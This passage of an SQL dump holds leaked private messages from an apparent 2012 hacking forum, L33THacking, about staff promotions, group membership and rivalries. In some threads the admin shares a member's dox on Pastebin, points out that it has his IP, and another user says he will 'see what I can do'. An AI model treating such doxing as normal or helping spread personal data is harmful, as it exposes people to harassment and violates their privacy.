'1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2797', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: I got doxed...', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nI heard you doxed me..\r\n\r\nhttp://pastebin.com/Sd9z60se\r\n\r\nI don\'t like what happened. Take it down.\r\n\r\n\r\nAF owner told me you done this.\r\n\r\nHow could he know that I am \"slim, possibly short, and wear glasses?\" None of my photos are online. And the only photo I showed that was online was the one I sent you for the Swag Award. Great...\r\n\r\nt3h jok3r, I sometimes wish I never even met you.. You don\'t know what I\'m experiencing in life right now. And it\'s getting worse each day... \r\n[/quote]\r\n\r\nI gave that DOX to someone on Skype the day I was pissed off. The DOX is posted with no account, all I can do is that I can create an account and report a take down. Actually I honestly think I never met you because I tried to help you every single time but guess what happened you fucked it up and blamed me. If you want faster take down then you can report the take down on Pastebin and since they will have your IP they won\'t need to investigate. \r\n[/quote]\r\n\r\n\r\nYou were pissed off at me?\r\nFor what reason?\r\n\r\n\r\nWho was this guy you sent it to on Skype???\r\n\r\n[/quote]\r\n\r\nHe blocked me, it\'s useless plus you won\'t even believe me it\'s useless just report the paste as personal information.', '1349744966', '0', '1', '0', '1', '0', '0', '1349784175'); INSERT INTO mybb_privatemessages VALUES('2798', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Ridiculous ', '0', '[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?', '1349745130', '0', '3', '1349749251', '1', '0', '0', '1349749237'); INSERT INTO mybb_privatemessages VALUES('2804', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.', '1349749251', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2806', '222', '203', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: fearless group', '0', '[quote=\'NeonLights\']\r\nHey, its me neon was wondering how do i join the new group fearless?\r\n\r\nhope to hear from you soon :)\r\n\r\n[/quote]\r\n\r\nYep added you guys. I hope to see content and stuff in the fearless group section. :D', '1349750270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2807', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Ridiculous ', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?', '1349751033', '0', '3', '1349758314', '1', '0', '0', '1349758303'); INSERT INTO mybb_privatemessages VALUES('2808', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Admin', '0', 'I\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?', '1349751084', '0', '3', '1349752085', '1', '0', '0', '1349752068'); INSERT INTO mybb_privatemessages VALUES('2809', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Fearless', '0', 'Can I be a member of your group?', '1349751251', '0', '3', '1349758220', '1', '0', '0', '1349758177'); INSERT INTO mybb_privatemessages VALUES('3949', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\nHey man whats happening \r\n[/quote]\r\n\r\n1. No gasoline for the next 3 days and my car is out of gas.\r\n2. All subways and buses shut down.\r\n3. Luckily my block is the only block with electricity which also means no fast food :(\r\n4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down.\r\n5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs.\r\n6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water.', '1351736326', '0', '3', '1351736432', '1', '0', '0', '1351736368'); INSERT INTO mybb_privatemessages VALUES('2812', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.', '1349752085', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2813', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Admin', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.\r\n[/quote]\r\nAlright and if you had to give your Staff position to someone, who would you give it too? ', '1349752528', '0', '3', '1349752650', '1', '0', '0', '1349752573'); INSERT INTO mybb_privatemessages VALUES('2815', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.\r\n[/quote]\r\nAlright and if you had to give your Staff position to someone, who would you give it too? \r\n[/quote]\r\n\r\nThats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone.', '1349752650', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2816', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Admin', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.\r\n[/quote]\r\nAlright and if you had to give your Staff position to someone, who would you give it too? \r\n[/quote]\r\n\r\nThats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone.\r\n[/quote]\r\n\r\nWhat is your opinion on Reborn?', '1349752689', '0', '3', '1349752821', '1', '0', '0', '1349752712'); INSERT INTO mybb_privatemessages VALUES('2818', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', 'Id like to see him back in power. If he took my place and I was moved to admin I would be happy about that.', '1349752747', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2820', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.\r\n[/quote]\r\nAlright and if you had to give your Staff position to someone, who would you give it too? \r\n[/quote]\r\nI hope you don\'t mind this either\r\nhttp://l33thacking.net/user-246.html\r\nThats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone.\r\n[/quote]\r\n\r\nWhat is your opinion on Reborn?\r\n[/quote]', '1349752821', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2821', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Admin', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nI\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking?\r\n[/quote]\r\nI would love that man.\r\n[/quote]\r\nAlright and if you had to give your Staff position to someone, who would you give it too? \r\n[/quote]\r\nI hope you don\'t mind this either\r\nhttp://l33thacking.net/user-246.html\r\nThats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone.\r\n[/quote]\r\n\r\nWhat is your opinion on Reborn?\r\n[/quote]\r\n[/quote]\r\n\r\nThanks for banning him but I unbanned him because I want him to speak up. Are you serious about Reborn because I\'m thinking of promoting him and then making VirtualLegend a Mod because I offered to leave a Admin spot for a Mod spot here. ', '1349752939', '0', '3', '1349753058', '1', '0', '0', '1349753013'); INSERT INTO mybb_privatemessages VALUES('3948', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: YouTube', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nThe following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral.\r\n[/quote]\r\nFixed link I think. Not sure.\r\n[/quote]\r\n\r\nActually if you don\'t mind can you take it down because it says \"l33thackingcom\" is our twitter but it\'s \"l33thackingnet\" now.', '1351736025', '0', '3', '1351769135', '1', '0', '0', '1351769115'); INSERT INTO mybb_privatemessages VALUES('2824', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', 'Yeah like I said, If you give back reborn smod, virtual legend mod and me admin Id be 100% happy with that.', '1349753058', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2825', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Admin', '0', '[quote=\'NXK\']\r\nYeah like I said, If you give back reborn smod, virtual legend mod and me admin Id be 100% happy with that.\r\n[/quote]\r\n\r\nLol ok. ', '1349753108', '0', '1', '0', '1', '0', '0', '1349753190'); INSERT INTO mybb_privatemessages VALUES('2826', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Skype', '0', 'Can you come on Skype need to talk.', '1349755374', '0', '3', '1349783809', '1', '0', '0', '1349783764'); INSERT INTO mybb_privatemessages VALUES('2828', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fearless', '0', '[quote=\'t3h jok3r\']\r\nCan I be a member of your group?\r\n[/quote]\r\n\r\nYes of course :D....As I told the other members of the group I hope to see you guys releasing some nice SE content and some of your own methods. :D', '1349758220', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2830', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?\r\n[/quote]\r\nYes please', '1349758314', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2831', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Fearless', '0', '[quote=\'flamingworm\']\r\n[quote=\'t3h jok3r\']\r\nCan I be a member of your group?\r\n[/quote]\r\n\r\nYes of course :D....As I told the other members of the group I hope to see you guys releasing some nice SE content and some of your own methods. :D\r\n[/quote]\r\n\r\nCool add me. ', '1349758335', '0', '1', '0', '1', '0', '0', '1349758347'); INSERT INTO mybb_privatemessages VALUES('2832', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Ridiculous ', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?\r\n[/quote]\r\nYes please\r\n[/quote]\r\n\r\nIt\'s on Pastebin, type in Dox of iTzIpod', '1349758385', '0', '3', '1349758923', '1', '0', '0', '1349758811'); INSERT INTO mybb_privatemessages VALUES('2834', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey....', '0', 'You have to request to be in the group....do that and then I can... :D. Like on the groups page or whatever', '1349758406', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2836', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ooooopps', '0', 'Oh nevermind figured out how to just add you manually....', '1349758472', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2837', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: ooooopps', '0', '[quote=\'flamingworm\']\r\nOh nevermind figured out how to just add you manually....\r\n[/quote]\r\n\r\nLol so did you add me?', '1349758773', '0', '3', '1349758867', '1', '0', '0', '1349758853'); INSERT INTO mybb_privatemessages VALUES('2839', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ooooopps', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'flamingworm\']\r\nOh nevermind figured out how to just add you manually....\r\n[/quote]\r\n\r\nLol so did you add me?\r\n[/quote]\r\n\r\nYeh lol...you should be good :D', '1349758867', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2841', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?\r\n[/quote]\r\nYes please\r\n[/quote]\r\n\r\nIt\'s on Pastebin, type in Dox of iTzIpod\r\n[/quote]\r\nOkay I got it, too bad it doesnt have his address.', '1349758923', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2842', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: ooooopps', '0', '[quote=\'flamingworm\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'flamingworm\']\r\nOh nevermind figured out how to just add you manually....\r\n[/quote]\r\n\r\nLol so did you add me?\r\n[/quote]\r\n\r\nYeh lol...you should be good :D\r\n[/quote]\r\nGood in? ', '1349759139', '0', '3', '1349759434', '1', '0', '0', '1349759378'); INSERT INTO mybb_privatemessages VALUES('2843', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Ridiculous ', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?\r\n[/quote]\r\nYes please\r\n[/quote]\r\n\r\nIt\'s on Pastebin, type in Dox of iTzIpod\r\n[/quote]\r\nOkay I got it, too bad it doesnt have his address.\r\n[/quote]\r\n\r\nIt has his IP tough lol. ', '1349759162', '0', '3', '1349760126', '1', '0', '0', '1349760109'); INSERT INTO mybb_privatemessages VALUES('2845', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ooooopps', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'flamingworm\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'flamingworm\']\r\nOh nevermind figured out how to just add you manually....\r\n[/quote]\r\n\r\nLol so did you add me?\r\n[/quote]\r\n\r\nYeh lol...you should be good :D\r\n[/quote]\r\nGood in? \r\n[/quote]\r\n\r\nYes as long as you contribute to the social engineering section and contribute to discussions in the fearless section than you will stay in :D. And yes you are in', '1349759434', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2847', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro check my rep and see what NeonLights put. No body likes me lol.\r\n[/quote]\r\n\r\nHe put nothing?\r\n[/quote]\r\nYea he took it off.\r\n[/quote]\r\n\r\nOK and do you want his DOX?\r\n[/quote]\r\nYes please\r\n[/quote]\r\n\r\nIt\'s on Pastebin, type in Dox of iTzIpod\r\n[/quote]\r\nOkay I got it, too bad it doesnt have his address.\r\n[/quote]\r\n\r\nIt has his IP tough lol. \r\n[/quote]\r\nOkay I will see what I can do.', '1349760126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2849', '61', '61', '249', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'API', '0', 'Hey NXK,\r\n\r\nMay I please have the API for the Skype Resolver?\r\n\r\nThanks\r\n\r\n-Ulti', '1349769598', '0', '3', '1349783837', '1', '0', '0', '1349783754'); INSERT INTO mybb_privatemessages VALUES('2850', '249', '61', '249', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'API', '0', 'Hey NXK,\r\n\r\nMay I please have the API for the Skype Resolver?\r\n\r\nThanks\r\n\r\n-Ulti', '1349769598', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2852', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype', '0', '[quote=\'t3h jok3r\']\r\nCan you come on Skype need to talk.\r\n[/quote]\r\n\r\nSorry I wasn\'t online last night I have class in the morning. Ill be on at around 3pm today.', '1349783809', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2854', '61', '249', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"249\";}}', '2', 'Re: API', '0', '[quote=\'Ultimatum\']\r\nHey NXK,\r\n\r\nMay I please have the API for the Skype Resolver?\r\n\r\nThanks\r\n\r\n-Ulti\r\n[/quote]\r\nAPI is down.', '1349783837', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2855', '222', '222', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: fearless group', '0', '[quote=\'flamingworm\']\r\n[quote=\'NeonLights\']\r\nHey, its me neon was wondering how do i join the new group fearless?\r\n\r\nhope to hear from you soon :)\r\n\r\n[/quote]\r\n\r\nYep added you guys. I hope to see content and stuff in the fearless group section. :D\r\n[/quote]\r\n\r\nhaha awsomme thx :)', '1349809558', '0', '1', '0', '1', '0', '2', '1349809611'); INSERT INTO mybb_privatemessages VALUES('2859', '62', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Skype group....', '0', 'Hey if you would like to be apart of our skype group then just let me know....my skype name is : flamingworm. I can add you to the group when I get home', '1349811683', '0', '1', '0', '1', '0', '2', '1349811970'); INSERT INTO mybb_privatemessages VALUES('2860', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Skype group....', '0', 'Hey if you would like to be apart of our skype group then just let me know....my skype name is : flamingworm. I can add you to the group when I get home', '1349811683', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2862', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Name change....', '0', 'Hey can I change my name to ƒ???????????g :D....thanks', '1349811850', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2864', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Nvm about the username...', '0', 'Obviously I figured it out :)', '1349813532', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2865', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Skype', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nCan you come on Skype need to talk.\r\n[/quote]\r\n\r\nSorry I wasn\'t online last night I have class in the morning. Ill be on at around 3pm today.\r\n[/quote]\r\n\r\nI forgot what I was about to discuss lol.', '1349823577', '0', '1', '0', '1', '0', '0', '1349831278'); INSERT INTO mybb_privatemessages VALUES('2917', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Mod', '0', '[quote=\'VirtualLegend\']\r\nI have done what you asked \r\n[/quote]\r\nDone.', '1349911775', '0', '1', '0', '1', '0', '0', '1349955655'); INSERT INTO mybb_privatemessages VALUES('2918', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Sup', '0', 'Sup what\'s wrong man you have been inactive recently and away from L33THacking for a couple of days.', '1349912189', '0', '3', '1349930097', '1', '0', '0', '1349930038'); INSERT INTO mybb_privatemessages VALUES('3025', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.\r\n[/quote]\r\n\r\nWell OK then ;)\r\n[/quote]\r\nDoes that help you?', '1350094822', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2875', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'Hey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]', '1349826174', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2876', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey...', '0', '[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? ', '1349826274', '0', '3', '1349826343', '1', '0', '0', '1349826297'); INSERT INTO mybb_privatemessages VALUES('2878', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?', '1349826343', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2879', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey...', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?\r\n[/quote]\r\n\r\nWhat do you mean?', '1349826423', '0', '3', '1349826547', '1', '0', '0', '1349826448'); INSERT INTO mybb_privatemessages VALUES('2881', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?\r\n[/quote]\r\n\r\nWhat do you mean?\r\n[/quote]\r\n\r\nYou said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :)', '1349826547', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2882', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey...', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?\r\n[/quote]\r\n\r\nWhat do you mean?\r\n[/quote]\r\n\r\nYou said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :)\r\n[/quote]\r\n\r\nI totally agree with you. I\'m coming online in 4 minutes. ', '1349826641', '0', '3', '1349835272', '1', '0', '0', '1349835242'); INSERT INTO mybb_privatemessages VALUES('3022', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h 